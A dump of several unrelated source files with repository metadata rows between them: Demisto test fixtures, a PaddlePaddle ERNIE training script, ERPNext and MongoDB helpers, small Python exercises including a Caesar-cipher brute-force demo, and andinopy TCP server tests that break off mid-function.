'isTodo': False, 'tags': None, 'tagsRaw': None, 'startDate': '0001-01-01T00:00:00Z', 'times': 0,
'recurrent': False, 'endingDate': '0001-01-01T00:00:00Z', 'timezoneOffset': 0, 'cronView': False,
'scheduled': False, 'entryTask': None, 'taskId': '', 'playbookId': '', 'reputationSize': 0,
'contentsSize': 0, 'brand': 'Builtin', 'instance': 'Builtin', 'IndicatorTimeline': None,
'mirrored': False}, 'IndicatorTimeline': None}]
TASKS_RESULT = [
{'ModuleName': 'Demisto REST API_instance_1', 'Brand': 'Demisto REST API', 'Category': 'Utilities', 'ID': '',
'Version': 0, 'Type': 1, 'Contents': {'response': [{'ancestors': ['AutoFocusPolling'],
'arguments': {'additionalPollingCommandArgNames': '',
'additionalPollingCommandArgValues': '',
'ids': '', 'pollingCommand': '',
'pollingCommandArgName': 'ids'},
'comments': False, 'completedBy': 'DBot',
'completedDate': '2020-09-29T16:48:30.427891714Z',
'doNotSaveTaskHistory': True,
'dueDate': '0001-01-01T00:00:00Z', 'dueDateDuration': 0,
'entries': ['4@7', '5@7'],
'evidenceData': {'description': None, 'occurred': None,
'tags': None}, 'forEachIndex': 0,
'forEachInputs': None, 'id': '3', 'indent': 0,
'nextTasks': {'#none#': ['1']}, 'note': False, 'outputs': {},
'playbookInputs': None, 'previousTasks': {'#none#': ['0']},
'quietMode': 2, 'reputationCalc': 0,
'restrictedCompletion': False, 'scriptArguments': {
'additionalPollingCommandArgNames': {'complex': None,
'simple': '${inputs.AdditionalPollingCommandArgNames}'},
'additionalPollingCommandArgValues': {'complex': None,
'simple': '${inputs.AdditionalPollingCommandArgValues}'},
'ids': {'complex': None, 'simple': '${inputs.Ids}'},
'pollingCommand': {'complex': None, 'simple': '${inputs.PollingCommandName}'},
'pollingCommandArgName': {'complex': None, 'simple': '${inputs.PollingCommandArgName}'}},
'separateContext': False,
'startDate': '2020-09-29T16:48:30.324811804Z',
'state': 'Error', 'task': {
'brand': '', 'conditions': None,
'description': 'RunPollingCommand',
'id': 'c6a3af0a-cc78-4323-80c1-93d686010d86',
'isCommand': False,
'isLocked': False,
'modified': '2020-09-29T08:23:25.596407031Z',
'name': 'RunPollingCommand',
'playbookName': '',
'scriptId': 'RunPollingCommand',
'sortValues': None,
'type': 'regular', 'version': 1},
'taskCompleteData': [],
'taskId': 'c6a3af0a-cc78-4323-80c1-93d686010d86',
'type': 'regular',
'view': {'position': {'x': 50, 'y': 195}}}]},
'HumanReadable': None, 'ImportantEntryContext': None, 'EntryContext': None, 'IgnoreAutoExtract': False,
'ReadableContentsFormat': '', 'ContentsFormat': 'json', 'File': '', 'FileID': '', 'FileMetadata': None,
'System': '', 'Note': False, 'Evidence': False, 'EvidenceID': '', 'Tags': None,
'Metadata': {
'id': '', 'version': 0, 'modified': '0001-01-01T00:00:00Z', 'sortValues': None, 'roles': None,
'allRead': False, 'allReadWrite': False, 'previousRoles': None, 'previousAllRead': False,
'previousAllReadWrite': False, 'hasRole': False, 'dbotCreatedBy': '', 'ShardID': 0, 'type': 1,
'created': '2020-10-03T12:43:23.006018275Z', 'retryTime': '0001-01-01T00:00:00Z', 'user': '',
'errorSource': '', 'contents': '', 'format': 'json', 'investigationId': '51', 'file': '',
'fileID': '', 'parentId': '158@51', 'pinned': False, 'fileMetadata': None,
'parentContent': '!demisto-api-post uri="investigation/7/workplan/tasks" body='
'"{\\"states\\":[\\"Error\\"],\\"types\\":[\\"regular\\",\\"condition\\",\\"collection\\"]}"',
'parentEntryTruncated': False, 'system': '', 'reputations': None, 'category': '', 'note': False,
'isTodo': False, 'tags': None, 'tagsRaw': None, 'startDate': '0001-01-01T00:00:00Z', 'times': 0,
'recurrent': False, 'endingDate': '0001-01-01T00:00:00Z', 'timezoneOffset': 0, 'cronView': False,
'scheduled': False, 'entryTask': None, 'taskId': '', 'playbookId': '', 'reputationSize': 0,
'contentsSize': 0, 'brand': 'Demisto REST API', 'instance': 'Demisto REST API_instance_1',
'IndicatorTimeline': None, 'mirrored': False}, 'IndicatorTimeline': None}]
SERVER_URL = [{'ModuleName': 'CustomScripts',
'Brand': 'Scripts',
'Category': 'automation',
'ID': '', 'Version': 0,
'Type': 1,
'Contents': 'https://ec2-11-123-11-22.eu-west-1.compute.amazonaws.com//acc_test',
'HumanReadable': 'https://ec2-11-123-11-22.eu-west-1.compute.amazonaws.com//acc_test'}]
| 73.178344 | 120 | 0.400296 |
876e608ab1ad7269c5b3143258735f34b8ee792d
| 6,885 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-12T06:52:43.000Z
|
2022-01-12T06:52:43.000Z
|
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | null | null | null |
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import ast
import argparse
import warnings
from functools import partial
from data import read, load_dict, convert_example_to_features
from model import ErnieForTokenClassification
from utils import set_seed
from evaluate import evaluate
import paddle
import paddle.nn.functional as F
from paddlenlp.datasets import load_dataset
from paddlenlp.transformers import ErnieTokenizer, ErnieModel, LinearDecayWithWarmup
from paddlenlp.data import Stack, Pad, Tuple
from paddlenlp.metrics import ChunkEvaluator
warnings.filterwarnings("ignore")
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("--model_name", type=str, default="trigger", help="The trigger or role model which you wanna train")
parser.add_argument("--num_epoch", type=int, default=3, help="Number of epoches for fine-tuning.")
parser.add_argument("--learning_rate", type=float, default=5e-5, help="Learning rate used to train with warmup.")
parser.add_argument("--tag_path", type=str, default=None, help="tag set path")
parser.add_argument("--train_path", type=str, default=None, help="train data")
parser.add_argument("--dev_path", type=str, default=None, help="dev data")
parser.add_argument("--weight_decay", type=float, default=0.01, help="Weight decay rate for L2 regularizer.")
parser.add_argument("--warmup_proportion", type=float, default=0.1, help="Warmup proportion params for warmup strategy")
parser.add_argument("--max_seq_len", type=int, default=512, help="Number of words of the longest seqence.")
parser.add_argument("--eval_step", type=int, default=100, help="evaluation step")
parser.add_argument("--log_step", type=int, default=20, help="log step")
parser.add_argument("--batch_size", type=int, default=32, help="Total examples' number in batch for training.")
parser.add_argument("--checkpoint", type=str, default=None, help="Directory to model checkpoint")
parser.add_argument("--seed", type=int, default=1000, help="random seed for initialization")
parser.add_argument('--device', choices=['cpu', 'gpu'], default="gpu", help="Select which device to train model, defaults to gpu.")
args = parser.parse_args()
# yapf: enable
def train():
# set running envir
paddle.set_device(args.device)
world_size = paddle.distributed.get_world_size()
rank = paddle.distributed.get_rank()
if world_size > 1:
paddle.distributed.init_parallel_env()
set_seed(args.seed)
if not os.path.exists(args.checkpoint):
os.mkdir(args.checkpoint)
model_name = "ernie-1.0"
# load and process data
tag2id, id2tag = load_dict(args.tag_path)
train_ds = load_dataset(read, data_path=args.train_path, lazy=False)
dev_ds = load_dataset(read, data_path=args.dev_path, lazy=False)
tokenizer = ErnieTokenizer.from_pretrained(model_name)
trans_func = partial(convert_example_to_features, tokenizer=tokenizer, tag2id=tag2id, max_seq_length=args.max_seq_len, pad_default_tag="O", is_test=False)
train_ds = train_ds.map(trans_func, lazy=False)
dev_ds = dev_ds.map(trans_func, lazy=False)
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=tokenizer.pad_token_id), # input_ids
Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # token_type
Stack(), # seq len
Pad(axis=0, pad_val=-1) # tag_ids
): fn(samples)
train_batch_sampler = paddle.io.DistributedBatchSampler(train_ds, batch_size=args.batch_size, shuffle=True)
dev_batch_sampler = paddle.io.DistributedBatchSampler(dev_ds, batch_size=args.batch_size, shuffle=False)
train_loader = paddle.io.DataLoader(train_ds, batch_sampler=train_batch_sampler, collate_fn=batchify_fn)
dev_loader = paddle.io.DataLoader(dev_ds, batch_sampler=dev_batch_sampler, collate_fn=batchify_fn)
# configure model training
ernie = ErnieModel.from_pretrained(model_name)
event_model = ErnieForTokenClassification(ernie, num_classes=len(tag2id))
event_model = paddle.DataParallel(event_model)
num_training_steps = len(train_loader) * args.num_epoch
lr_scheduler = LinearDecayWithWarmup(args.learning_rate, num_training_steps, args.warmup_proportion)
decay_params = [p.name for n, p in event_model.named_parameters() if not any(nd in n for nd in ["bias", "norm"])]
optimizer = paddle.optimizer.AdamW(learning_rate=lr_scheduler, parameters=event_model.parameters(), weight_decay=args.weight_decay, apply_decay_param_fun=lambda x: x in decay_params)
metric = ChunkEvaluator(label_list=tag2id.keys(), suffix=False)
# start to train event_model
global_step, best_f1 = 0, 0.
event_model.train()
for epoch in range(1, args.num_epoch+1):
for batch_data in train_loader:
input_ids, token_type_ids, seq_len, tag_ids = batch_data
# logits: [batch_size, seq_len, num_tags] --> [batch_size*seq_len, num_tags]
logits = event_model(input_ids, token_type_ids).reshape([-1, len(tag2id)])
loss = paddle.mean(F.cross_entropy(logits, tag_ids.reshape([-1]), ignore_index=-1))
loss.backward()
lr_scheduler.step()
optimizer.step()
optimizer.clear_grad()
if global_step > 0 and global_step % args.log_step == 0 and rank == 0:
print(f"{args.model_name} - epoch: {epoch} - global_step: {global_step}/{num_training_steps} - loss:{loss.numpy().item():.6f}")
if global_step > 0 and global_step % args.eval_step == 0 and rank == 0:
precision, recall, f1_score = evaluate(event_model, dev_loader, metric)
event_model.train()
if f1_score > best_f1:
print(f"best F1 performence has been updated: {best_f1:.5f} --> {f1_score:.5f}")
best_f1 = f1_score
paddle.save(event_model.state_dict(), f"{args.checkpoint}/{args.model_name}_best.pdparams")
print(f'{args.model_name} evalution result: precision: {precision:.5f}, recall: {recall:.5f}, F1: {f1_score:.5f} current best {best_f1:.5f}')
global_step += 1
if rank == 0:
paddle.save(event_model.state_dict(), f"{args.checkpoint}/{args.model_name}_final.pdparams")
if __name__=="__main__":
train()
| 48.485915 | 186 | 0.719971 |
5e84984ae0f06d786328916607bcc1625391072b
| 562 |
py
|
Python
|
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
_4digit: grove.TM1637 = None
def on_forever():
global _4digit
if input.button_is_pressed(Button.A):
_4digit = grove.create_display(DigitalPin.C16, DigitalPin.C17)
_4digit.bit(1, 3)
basic.pause(1000)
_4digit.bit(2, 3)
basic.pause(1000)
_4digit.bit(3, 3)
basic.pause(1000)
_4digit.bit(1, 2)
basic.pause(1000)
_4digit.bit(2, 2)
basic.pause(1000)
_4digit.bit(3, 2)
basic.pause(1000)
_4digit.clear()
basic.forever(on_forever)
| 26.761905 | 71 | 0.571174 |
0de689074f3d0903c9e424541e0d4a0beb6145f1
| 704 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from erpnext.accounts.doctype.gl_entry.gl_entry import update_outstanding_amt
def execute():
for dt, party_field, account_field in (("Sales Invoice", "customer", "debit_to"),
("Purchase Invoice", "supplier", "credit_to")):
wrong_invoices = frappe.db.sql("""select name, {0} as account from `tab{1}`
where docstatus=1 and ifnull({2}, '')=''""".format(account_field, dt, party_field))
for invoice, account in wrong_invoices:
update_outstanding_amt(account, party_field.title(), None, dt, invoice)
| 44 | 86 | 0.738636 |
df66648f74dafed3138c1218f750827e93a15a4f
| 1,536 |
py
|
Python
|
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
from collections.abc import MutableMapping
class DatabaseDictionary(MutableMapping):
'''
A persistent dictionary, which only accepts str keys.
It is based and reliant on a mongoDB
'''
def __init__(self, url='localhost', port=27017, database_timeout_ms=2000):
self.mongo_client = MongoClient(url, port,
serverSelectionTimeoutMS=database_timeout_ms)
print("Trying to connect to database...")
# Connect DB. Will raise ConnectionError if no DB found
self.mongo_client.admin.command('ismaster')
# Store handles for our collection
self.mongo_database = self.mongo_client['pjki']
self.mongo_collection = self.mongo_database['game-history']
print("Database connected.")
def __getitem__(self, key):
if type(key) is not str:
raise TypeError('Key is not string')
hit = self.mongo_collection.find_one({'key': key})
return hit['value'] if hit else None
def __setitem__(self, key, value):
self.mongo_collection.delete_many({'key': key})
self.mongo_collection.insert_one({
'key': key,
'value': value
})
def __delitem__(self, key):
self.mongo_collection.delete_many({'key': key})
def __iter__(self):
return iter([entry['key'] for entry in self.mongo_collection.find()])
def __len__(self):
return self.mongo_collection.count_documents({})
| 31.346939 | 78 | 0.66276 |
10ffea6e650097420cba320c4e53e75a1cbfa21f
| 3,103 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-03-07T10:51:21.000Z
|
2022-03-07T10:51:21.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from ..registry import LOSSES
from .base import BaseWeightedLoss
@LOSSES.register()
class ActBertLoss(BaseWeightedLoss):
"""Loss for ActBert model
"""
def __init__(self, vocab_size=30522, a_target_size=700):
super().__init__()
self.vocab_size = vocab_size
self.a_target_size = a_target_size
self.loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
self.vis_criterion = nn.KLDivLoss(reduction="none")
def forward(self, prediction_scores_t, prediction_scores_v, prediction_scores_a, seq_relationship_score, \
text_labels, image_label, image_target, action_label, next_sentence_label):
"""
Args:
text_label: text label(with mask). Shape: [batch_size, seqence_length]
image_label: image label(with mask). Shape: [batch_size, region_length]
image_target: label of image feature distribution,
Shape: [batch_size, region_length-1, num_image_class](minus 1 for xxx).
action label: action label(with mask), Shape: [batch_size, action_length]
next_sentence_label: is next sentence or not. Shape: [batch_size]
"""
prediction_scores_v = prediction_scores_v[:,
1:] #8,37,1601 --> 8,36,1601
img_loss = self.vis_criterion(
F.log_softmax(prediction_scores_v, axis=2),
image_target #8,36,1601
)
masked_img_loss = paddle.sum(
img_loss * (image_label == 1).unsqueeze(2).astype('float32')) / max(
paddle.sum((image_label == 1).astype('float32')), 1e-6)
masked_text_loss = self.loss_fct(
prediction_scores_t.reshape([-1, self.vocab_size]), #8,36,30522
text_labels.reshape([-1]), #8,36 # label -1 will be ignored
)
masked_action_loss = self.loss_fct(
prediction_scores_a.reshape([-1, self.a_target_size]), #8,5,700
action_label.reshape([-1]), #8,5
)
next_sentence_loss = self.loss_fct(
seq_relationship_score.reshape([-1, 2]),
next_sentence_label.reshape([-1]) #8,2
)
total_loss = masked_text_loss.unsqueeze(0) + masked_img_loss.unsqueeze(
0) + masked_action_loss.unsqueeze(0) + next_sentence_loss.unsqueeze(
0)
return total_loss
| 40.828947 | 110 | 0.651305 |
80271e9a71149f2c4d6cbfc01bfb28367b274d91
| 670 |
py
|
Python
|
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
import sys
def test():
N = 12
rating = [6, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 5]
min = [2, 1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3]
res = 53
res_list = [7, 1, 2, 3, 4, 4, 4, 5, 5, 6, 7]
N = int(sys.stdin.readline())
rating = list(map(int, sys.stdin.readline().split()))
min_num_shares = list(map(int, sys.stdin.readline().split()))
for i in range(N - 1):
if rating[i + 1] > rating[i]:
min_num_shares[i + 1] = min_num_shares[i] + 1
for i in reversed(range(N - 1)):
if rating[i] > rating[i + 1] and min_num_shares[i] <= min_num_shares[i + 1]:
min_num_shares[i] = min_num_shares[i + 1] + 1
print(min_num_shares)
print(sum(min_num_shares))
| 30.454545 | 80 | 0.574627 |
d548fc4da25b7c6af8763df016af13aa1a9964e2
| 287 |
py
|
Python
|
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | null | null | null |
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | 3 |
2021-03-10T13:18:31.000Z
|
2021-05-11T09:20:11.000Z
|
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | null | null | null |
import redis
from gpiozero import LED
from time import sleep
r = redis.StrictRedis(host='localhost', port=6379, db=0)
p = r.pubsub()
p.subscribe('move')
led = LED(2)
while True:
message = p.get_message()
if message:
led.on()
sleep(5)
led.off()
sleep(1)
| 16.882353 | 56 | 0.630662 |
1272611f7036314ac6792ab0e628f710b4806159
| 317 |
py
|
Python
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
# カスタムコンポーネントを定義
def length_component(doc):
# docの長さを取得
doc_length = ____
print(f"この文章は {doc_length} トークンの長さです。")
# docを返す
____
# 小サイズの日本語モデルを読み込む
nlp = spacy.load("ja_core_news_sm")
# パイプラインの最初にコンポーネントを追加し、パイプラインの名前を表示
____.____(____)
print(nlp.pipe_names)
# テキストを処理
doc = ____
| 15.095238 | 43 | 0.725552 |
c3ac35dc4575989fa92ffea6fb532c848ca3c735
| 638 |
py
|
Python
|
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/local/bin/python3
"""
Demo für einen Brute-Force-Angriff auf eine Caesar-Verschlüsslung
HackerSchool 2020
"""
def caesar(text, schluessel):
"""
Verschluesselt klartext durch Verschiebung der Buchstaben um
schluessel gemaess Caesaren-Verschluesselung.
"""
chiffre = ""
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet += alphabet
for i in range(len(text)):
buchstabe = text[i]
stelle = alphabet.index(buchstabe)
chiffre += alphabet[stelle+schluessel]
return chiffre
demochiffre = "LEGOIVWGLSSP"
for i in range(27):
print("i = ", i, " :", caesar(demochiffre, -i))
| 25.52 | 65 | 0.673981 |
6180bc91ed5d948cc391d9b617aeea57c95d2e2f
| 9,700 |
py
|
Python
|
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
# _ _ _
# / \ _ __ __| (_)_ __ ___ _ __ _ _
# / _ \ | '_ \ / _` | | '_ \ / _ \| '_ \| | | |
# / ___ \| | | | (_| | | | | | (_) | |_) | |_| |
# /_/ \_\_| |_|\__,_|_|_| |_|\___/| .__/ \__, |
# |_| |___/
# by Jakob Groß
import os
import sys
import time
import socket
import unittest
from typing import List
import andinopy.tcp.simpletcp
import andinopy.tcp.andino_tcp
from unittest import TestCase
from andinopy.tcp.io_x1_emulator import x1_emulator
class TcpClient:
def __init__(self, Address: str, Port: int, timeout: int = 5):
# Create a TCP/IP socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(timeout)
self.server_connection = Address, Port
def connect(self) -> bool:
self.socket.connect(self.server_connection)
return True
def stop(self):
self.socket.close()
def send(self, message) -> bool:
self.socket.sendall(message.encode())
return True
def send_with_response(self, message, expected) -> bool:
self.socket.sendall(message.encode())
amount_received = 0
amount_expected = len(expected)
received = ""
while amount_received < amount_expected:
data = self.socket.recv(16)
amount_received += len(data)
received += data.decode()
if received == expected:
return True
return False
def receive_message(self):
return self.socket.recv(1024).decode()
class test_tcp_server(TestCase):
def test_receive(self):
# tracemalloc.start()
port = 9999
server_message = ""
def on_message(message: str, _):
nonlocal server_message
server_message = message
server = andinopy.tcp.simpletcp.tcp_server(port=port, on_message=on_message)
server.start()
client = TcpClient('localhost', port)
try:
assert (client.connect())
for i in range(10):
test_message = f"test {i}"
client.send(test_message)
time.sleep(0.1)
self.assertEqual(test_message, server_message)
finally:
server.stop()
client.stop()
self.assertEqual(server._running, False)
# tracemalloc.stop()
def test_tcp_broadcast(self):
port = 9998
test_message = "broadcast"
server = andinopy.tcp.simpletcp.tcp_server(port=port,
generate_broadcast=lambda x: test_message,
broadcast_timer=1)
client = TcpClient('localhost', port, )
try:
server.start()
assert (client.connect())
result = client.receive_message()
self.assertEqual(result, test_message)
finally:
server.stop()
client.stop()
def test_answer(self):
port = 9997
def on_message(message: str, handle: andinopy.tcp.simpletcp.tcp_server.client_handle):
handle.send_message(message)
try:
server = andinopy.tcp.simpletcp.tcp_server(port=port, on_message=on_message)
server.start()
client = TcpClient('localhost', port)
assert (client.connect())
for i in range(10000):
test_message = f"test {i}"
self.assertEqual(client.send_with_response(test_message, test_message), True)
finally:
client.stop()
server.stop()
class test_andino_tcp(TestCase):
port_number = 10000
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_1broadcast(self):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 8999
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
self.assertIsInstance(andino_tcp.x1_instance, x1_emulator)
inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
for i in andino_tcp.x1_instance.io.Inputs:
i.pull_up = False
andino_tcp.start()
client.connect()
try:
expected_low = 100
for _ in range(expected_low):
for i in inputs:
pin = gpiozero.Device.pin_factory.pin(i)
pin.drive_high()
pin.drive_low()
receive = client.receive_message()
self.assertEqual(":0000{64,64,64,64,64,64}{0,0,0,0,0,0}\n", receive)
finally:
andino_tcp.stop()
client.stop()
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_2relays(self):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 9995
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
andino_tcp.x1_instance.io.input_pull_up = [False for _ in range(len(inputs))]
andino_tcp.start()
client.connect()
try:
expect = "REL? 1\n"
client.send(expect)
receive = client.receive_message()
print(receive)
self.assertEqual(expect, receive)
for i in range(len(relays)):
message = f"REL{i + 1} 1\n"
client.send(message)
time.sleep(0.1)
self.assertEqual(andino_tcp.x1_instance.io.outRel[i].value, 1)
receive = client.receive_message()
self.assertEqual(message, receive)
time.sleep(andino_tcp.tcpserver.broadcast_timer)
receive = client.receive_message()
print(receive)
self.assertTrue(receive.endswith("{1,1,1}\n"))
finally:
andino_tcp.stop()
client.stop()
def test_pulsing(self):
if not sys.platform.startswith("linux"):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 9995
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
client = TcpClient('localhost', port, )
andino_tcp.start()
client.connect()
try:
expect = "REL? 1\n"
client.send(expect)
receive = client.receive_message()
self.assertEqual(expect, receive)
# Relay pulsing working?
for i in range(len(relays)):
message = f"RPU{i + 1} 5000\n"
client.send(message)
time.sleep(0.2)
# self.assertEqual(andino_tcp.x1_instance.io.outRel[i].value, 1)
receive = client.receive_message()
self.assertEqual(message, receive)
receive = client.receive_message()
self.assertTrue(receive.endswith("{1,1,1}\n"))
time.sleep(andino_tcp.tcpserver.broadcast_timer)
receive = client.receive_message()
self.assertTrue(receive.endswith("{0,0,0}\n"))
finally:
andino_tcp.stop()
client.stop()
def test_files(self):
directory = os.path.dirname(__file__)
for folder in os.listdir(directory):
folder_path = os.path.join(directory, folder)
if os.path.isdir(folder_path):
with self.subTest(folder):
in_path = os.path.join(folder_path, "out.txt")
out_path = os.path.join(folder_path, "in.txt")
self.assertTrue(os.path.isfile(in_path))
self.assertTrue(os.path.isfile(out_path))
in_file = open(in_path, "r")
out_file = open(out_path, "r")
try:
result = self.exec_test(in_file.read())
expected = out_file.read().splitlines()
self.assertEqual(expected, result)
finally:
in_file.close()
out_file.close()
def exec_test(self, input_file):
port = self.port_number
self.port_number += 1
if not sys.platform.startswith("linux"):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
output = []
def receive_answer(recv_client):
rec: List[str] = recv_client.receive_message().splitlines()
for i in rec:
if not i.startswith(":"):
return i
